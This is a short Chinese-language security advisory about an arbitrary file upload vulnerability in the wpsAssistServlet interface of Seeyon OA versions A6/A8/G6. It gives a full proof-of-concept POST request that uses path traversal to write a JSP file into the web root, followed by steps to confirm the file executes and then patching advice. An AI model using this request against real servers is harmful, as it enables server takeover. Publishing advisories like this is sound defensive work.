致远OA是一套办公协同管理软件。致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限。
致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1)
致远OA G6、G6N (V8.1、V8.1SP1)
1、调用文件上传接口上传测试文件,请求包如下:
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/test.jsp&fileId=2 HTTP/1.1Host: 127.0.0.1Content-Length: 349Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616bAccept-Encoding: gzip --59229605f98b8cf290a7b8908b34616bContent-Disposition: form-data; name="upload"; filename="test.txt"Content-Type: application/vnd.ms-excel <% out.println("seeyon_vuln");%> --59229605f98b8cf290a7b8908b34616b--
2、文件上传成功时,响应情况如下图所示:
3、访问上传文件:http://xx.xx.xx.xx/test.jsp,发现该文件成功被服务器解析。
1、对路径 /seeyon/htmlofficeservlet 进行限制访问。
2、致远官方已发布补丁,请联系官方安装相应补丁。
Copyright © 2023 leiyu.cn. All Rights Reserved. 磊宇云计算 版权所有 许可证编号:B1-20233142/B2-20230630 山东磊宇云计算有限公司 鲁ICP备2020045424号
磊宇云计算致力于以最 “绿色节能” 的方式,让每一位上云的客户成为全球绿色节能和降低碳排放的贡献者